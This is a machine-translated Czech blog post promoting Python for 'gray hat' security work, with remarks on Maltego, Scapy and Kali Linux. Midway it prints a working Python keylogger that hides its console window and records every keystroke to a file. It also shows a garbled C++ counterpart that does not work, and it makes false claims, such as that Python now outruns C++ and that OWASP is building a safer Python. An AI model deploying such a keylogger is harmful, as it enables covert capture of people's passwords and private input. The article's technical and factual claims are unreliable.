Gray Hat Python - Takže, před dvěma lety jsem dělal svůj výzkum programovacích jazyků, začal jsem číst o C, C ++, Assembly, Python a Ruby. Chtěl jsem se stát odborníkem na kybernetickou bezpečnost. Začal jsem se tedy učit co nejvíce. Začal jsem se základy C, C ++ a C # a po učení a kompilaci mnoha programů a virů jsem se konečně začal učit Kali Linux. Pro ty, kteří nevědí, co je Kali Linux, je to operační systém pro penetrační testování. Takže jsem pokračoval ve svých studiích a viděl jsem, že většina programů, virů a trojských koní byla kompilována v Pythonu a jejich základnou byla Ruby.
Takže jsem prozatím přestal studovat a začal jsem se učit Python nebo přesněji Gray Hat Python a tadaa… Bylo to velmi snadné ve srovnání s C, C # nebo jakýmkoli jiným jazykem, který jsem se naučil. Nakonec jsem poznal, proč je Python nejpoužívanějším jazykem a jak se proslavil.
Dnes bych tedy diskutoval o tom, jak se Python transformoval na Gray Hat Python a proč je tak hojně využíváno, že jej i Google a YouTube používají ve své databázi, aby poskytovaly co nejpřesnější výsledky vyhledávání.
Python je programovací jazyk na vysoké úrovni, což znamená, že jeho syntaxe jsou velmi snadno čitelné, a to i pro začátečníky. Pokud jste v programování nováčkem, byl by to jazyk, který bych vám doporučil začít. Dovolte mi uvést příklad:
Takto to vypadá v C: -
#include
int main()
(
printf("Hello world\n");
return 0;
)
Takto to vypadá v Javě: -
class HelloWorld
(
public static void main (String args())
(
System.out.println ("Hello World");
)
)
A takto to vypadá v Pythonu (v2.7)
print "Hello World"
Jednoduchý? Ano to je. Takže Python byl nejen snadno psatelný a srozumitelný, ale také velmi kompaktní. Takže by vás zajímalo, jak to vedlo k Gray Hat Pythonovi?
Doporučené kurzy
- IP Routing Training
- Výcvikový kurz Hacking
- Kompletní školení RMAN
- Trénink programování v Pythonu
Python vs Gray Hat Python
Co přesně je Gray Hat Python? Proč je to tak odlišné od našeho běžného Pythonu? Jde o to, že Gray Hat Python není nic jiného než programy napsané v Pythonu hackery, testery síťového stresu a reverzní inženýři, kteří vytvářejí nebo crackují program. Pojem šedý klobouk se používá, protože to není zrovna prospěšný nebo uživatelský software. Používá se k zabezpečení nebo k vytvoření softwaru prolomení zabezpečení.
Lze jej snadno použít buď k testování omezení zabezpečeného prostředí, nebo k proniknutí do zabezpečeného prostředí. To znamená šedý klobouk. A je mnohem snazší to udělat v Pythonu než dělat v C, C ++ nebo java. Tak se jmenuje Gray Hat Python. Několik příkladů, na které mohu myslet, jsou:
• Psaní loggerů klíčů (pro hackery a pentestery)
• Zápis skriptů prostředí zabezpečení (pro správce sítě)
• Psaní automatizovaného IDS (systém detekce narušení pro bezpečnostní inženýry)
Takže nyní víte proč a jak je Gray Hat Python užitečný. Abych to propracoval, dovolte mi uvést několik podrobných příkladů.
Možná jste slyšeli o Google App Engine. Google App Engine byl původně navržen v Pythonu před jeho portováním. Google App je vhodným příkladem programu napsaného v Pythonu, protože umožňuje vytvářet webové aplikace pomocí špičkové bohaté knihovny, nástrojů a rámce.
Přemýšleli jste někdy, proč je tak snadné něco na Googlu hledat? Většinu času získáte výsledky vyhledávání, které jsou 80% přesné. Je to proto, že Python je velmi flexibilní, pracuje vysokou rychlostí a databáze jsou mnohem kompaktnější, i když ukládá 'n' množství informací. Python je natolik rozšířitelný, že ho dokonce YouTube používá pro účely, jako je prohlížení videa, ovládání šablon, správa videa, přístup k kanonickým datům a mnoho dalších.
Google má prohledávače a pavouky, které shromažďují data, jakmile jsou nahrána na web, bez ohledu na to, kde a jak jsou bezpečná. K získání těchto informací potřebuje člověk pouze správnou inspiraci, čas a znalosti.
Prohledávání Google byla dříve založena na Pythonu, který se později změnil na C ++ kvůli optimalizaci rychlosti, protože prohledávače Google prolézají mnoho stránek za sekundu a každá z nich trvá několik minut, než se úspěšně proleze. Python, v současné době je mnohem rychlejší než C ++, ale to nebyl stejný případ před několika desítkami let.
Google citoval slavnou citaci: -
"Python, kde můžeme, C ++, kde musíme."
Možná se tedy ptáte, jak to lze použít pro hacking, pentesting a zabezpečení sítě. Dovoluji si nesouhlasit. Pokud byste mohli vytvořit program, který je 70% -80% přesný při poskytování efektivních výsledků vyhledávání, pak byste pravděpodobně mohli vytvořit aplikaci, která dokáže propojit weby, inteligentně vyhledávat a vytvořit profil osoby, kterou mohou spíše použít jednotlivé černé klobouky. pro škodlivé účely. Nechte jednotlivce stranou, pokud je dostatečně chytrý, můžete snadno vytvořit aplikaci pro vytvoření profilu společnosti, celého stromu od kořene až po vše, na co si vzpomenete …
Shromažďování informací přes Maltego
Možná si myslíte, že jsem trochu přehnaný. Ne, nejsem!
Pomyslete na příklady jako Maltego. Maltego je software nebo ho mohu lépe přeformulovat jako forenzní aplikaci s otevřeným zdrojovým kódem vytvořenou za účelem shromažďování informací a budování profilu lidí, společností a dalších korporátních agentur.
Jeden stačí zadat správná data do aplikace, a ostatní věci, jako je propojení e-mailů, lidí, skupiny lidí, dokonce i určování internetové infrastruktury, jako jsou domény, DNS jména, Netblocks a IP adresy mohou být propojeny a propojeny pomocí této open source inteligence .
Pro více informací navštivte vědět Co je Maltego?
Takže pokud přístup k „tajným informacím“ určuje váš úspěch, může vám Maltego pomoci objevit je. Maltego je částečně psáno v Pythonu a používá také Java, což je opět skvělý jazyk.
Tolik citací o bezpečnosti od Googlu. Abychom byli přesnější, Google je nejmenší způsob, jak si můžete udržet anonymitu na webu, nezáleží na tom, zda používáte inkognito nebo www.duckduckgo.com od chrome. Protože na webu je nakonec vše aktualizováno. Jde o to, že to není o nezranitelnosti, je to o absolutní zranitelnosti. Člověk se nemůže úplně vymazat z internetu. Ale člověk se určitě může pokusit udržet na webu co nejméně informací.
Python není jen jazyk, je to skriptovací jazyk. Skriptovací jazyky umožňují psát, upravovat vlastní nástroje, když potřebujete něco více vlastního. Tyto nástroje zabezpečení sítě jsou kvůli rozšiřitelnosti silně závislé na skriptovacím jazyce. Například pojďme vzít Scapy.
Scapy je čistě napsán v Pythonu. Je to silný interaktivní nástroj pro manipulaci s pakety. Může generovat falešné pakety sama o sobě, skenovat sítě a dokonce může čichat pakety v síti.
Naleznete podrobné informace o Co je Scapy?
Nyní se jedná o komplexní programy napsané pokročilými programátory. Uvidíme, jak snadné je napsat program v Pythonu, kterému snadno rozumějí lidé, kteří mají dobré základy programování.
Toto je keylogger napsaný v Pythonu: -
#!/usr/bin/Python
import pyHook
import Pythoncom
import win32gui
import win32console
log_file = "log_file.txt" #name of log file
window = win32console. GetConsoleWindow() #go to script window
win32gui.ShowWindow (window, 0) #hide window
def pressed_chars(event): #on key pressed function
if event.Ascii:
f = open(log_file, "a") # (open log_file in append mode)
char = chr (event.Ascii) # (insert real char in variable)
if char == "q": # (if char is q)
f.close() # (close and save log file)
exit() # (exit program)
if event.Ascii == 13: # (if char is "return")
f.write("\n") # (new line)
f.write(char) # (write char)
proc = pyHook.HookManager() #open pyHook
proc.KeyDown = pressed_chars #set pressed_chars function on KeyDown event
proc.HookKeyboard() #start the function
Pythoncom.PumpMessages() #get input
Takže, pokud se mě zeptáte, je to mnohem více než snadné. Právě jsem přidal moduly pyhook, Pythoncom, win32gui a win32console, které si můžete snadno stáhnout z webové stránky sourceforge a připomínky jsem zmínil pomocí hash-tagu. Ale pokud musím napsat stejný program v C ++, uvidíme, jak těžké to může být.
Toto je program napsaný v C ++: -
#include #include #include #include int main(int argc, char ** agrv)( using namepace std; /*Easier*/ char std::vector input_STRUCT = ("S", "T", "O"); char std::vector input_STRUCT_1 = ("P", ""); char std::vector input_STRUCT_2 = ("L", "O", "O", "K", "I", "N", "G"); char std::vector input_STRUCT_3 = ("", "F", "O", "R"); char std::vector input_STRUCT_4 = ("M", "A", "L", "W"); char std::vector input_STRUCT_5 = ("A", "R", "E"); ostream os("C:\users\keylogger.txt"); int i; for( i = 0; i <=2; i++)( os << input_STRUCT(i); for(;i <= 1000000 ;i++)( ) ) for( i=0; i<=1;i++)( os << input_STRING_1(i); for(;i <= 1000000 ;i++)( ) ) for(i=0; i<=6; i++) ( os << input_STRING_2 (i); for(; i <= 1000000 ; i++)( ) for(i=0; i<=3;i++)( os << input_STRING_3(i); for(; i <= 1000000 ;i++)( ) ) for(i=0; i<=3; i++)( os << input_STRING_4(i); for(;i <= 1000000 ; i++)( ) ) for(i=0; i<=2; i++)( os << input_STRING_5(i); for(;i <= 1000000 ; i++)( ) ) os.close(); istream is (" C:\users\keylogger.txt "); cout << is; return 0; )
Ve srovnání s Pythonem je to docela velké. A pokud mluvíme o efektivitě, pak lze Python snadno zkompilovat do spustitelného souboru pomocí softwaru py2exe. Zatímco když mluvím o C ++, pak upřímně řečeno, tento kód je vtip. Pro zápis správného loggeru klíčů je třeba napsat DLL, která implementuje WH_KEYBOARD háček. Kromě toho tento kód není pro začátečníka snadno pochopitelný.
Open Source Hacking
Teď se to stará o hackery Black Hat, kteří budou přesnější, jsou lidé, kteří hodlají zničit, manipulovat s daty pro jejich vlastní potřeby. Z pohledu bezpečnostních otázek je Python také užitečný pro hackery White Hat, kteří hodlají zachránit společnost před útokem škodlivých hackerů. Pokud si chcete rozvinout kariéru nebo se alespoň chcete naučit Python pro bezpečnostní výzkum, pak se můžete určitě dostat do hloubky pomocí OWASP, BRO nebo Quick NIX Secure Script.
OWASP je projekt zabezpečení otevřené webové aplikace. Cílem OWASP je vytvoření bezpečnější verze Pythonu, která usnadňuje odborníkům v oblasti zabezpečení a vývojářům psát méně náchylný software k útoku hackerů. Souvisí to s analýzou Black-Boxu, identifikováním a řešením problémů souvisejících s bezpečností, které mohou ovlivnit interaktivní interpret Pythonu.
BRO je program sledování sítě a sledování provozu, zatímco Quick NIX se používá k zatvrzování a zabezpečení vlastnictví souborů za běhu.
Protože mluvíme o bezpečnosti, pojďme mluvit o operačním systému, který je částečně založen na Pythonu. Python funguje skvěle s UNIX, LINUX a Debian. Jedním z nejznámějších operačních systémů byl Backtrack 5. Byly vydány různé verze. Byl speciálně navržen pro PenTesting. Později si lidé v Offensive Security mysleli, že Backtrack potřebuje restartovat, protože většina nástrojů buď nefungovala správně nebo nebyla podporována.
Později vydali Kali Linux, který byl zcela založen na Debianu. A většina jeho rámce je buď v Ruby nebo Pythonu. Ruby je také úžasný skriptovací jazyk. Ale já bych kdykoli preferoval Python před tím, protože Python má rozmanitější komunitu s Linuxem a jeho přímější a snadnější ladění. Zatímco Ruby má spoustu funkcí a rychle se přizpůsobuje okolnímu prostředí, může být obtížné jej ladit, obtížně číst a je sofistikovanější než Python.
Nejlepším příkladem by bylo srovnání Apple vs Linux nebo Porovnání iphone vs Android. Apple je bohatý na zdroje a je extrémně hladký a je více zaujatý vůči začátečníkům. Zatímco Linux / Android je uživatelsky přívětivější, trochu laggy a někdy může být bolest hlavy, pokud nevíte, jak jej nakonfigurovat nebo udržovat.
Existuje dokonce kniha založená na Pythonovi Grey Hat Hackingovi od Justina Seitze. Zabývá se konkrétně automatizací zdlouhavých úloh reverzního inženýrství a zabezpečení, navrhováním vlastního debuggeru, knihovny a DLL injekce, čicháním zabezpečeného provozu přes šifrovanou relaci a používáním debuggeru imunity, Sulleyho a mnoha dalších. Je to úžasná kniha, nezáleží na tom, zda jste začátečník nebo jste odborník, vždy se něco nebo něco naučíte pokaždé, když si ji přečtete.
Závěr
Takže, pokud jste začátečník, Python by byl tou pravou volbou, abyste mohli začít s vaším prvním jazykem testování programovacího zabezpečení.
Stačí si vzpomenout na jednu věc. Gray Hat Python není jen jazyk, je to způsob, jak dělat věci řádným a rychlým způsobem.
Zdroj prvního obrázku: pixabay.com
Související články: -
Zde je několik článků, které vám pomohou získat více podrobností o Pythonu Grey Hat, takže stačí projít odkaz.
- Výhody nástrojů Cyber security Musíte si být vědomi
- Kariéra v Pythonu
- 25 nejčastějších otázek a odpovědí na rozhovor v Pythonu
- Jaké jsou výhody a omezení používání Pythonu?
- Python vs Node.js
- Průvodce otázkami kybernetického zabezpečení
- Různé typy nástrojů pro testování bezpečnosti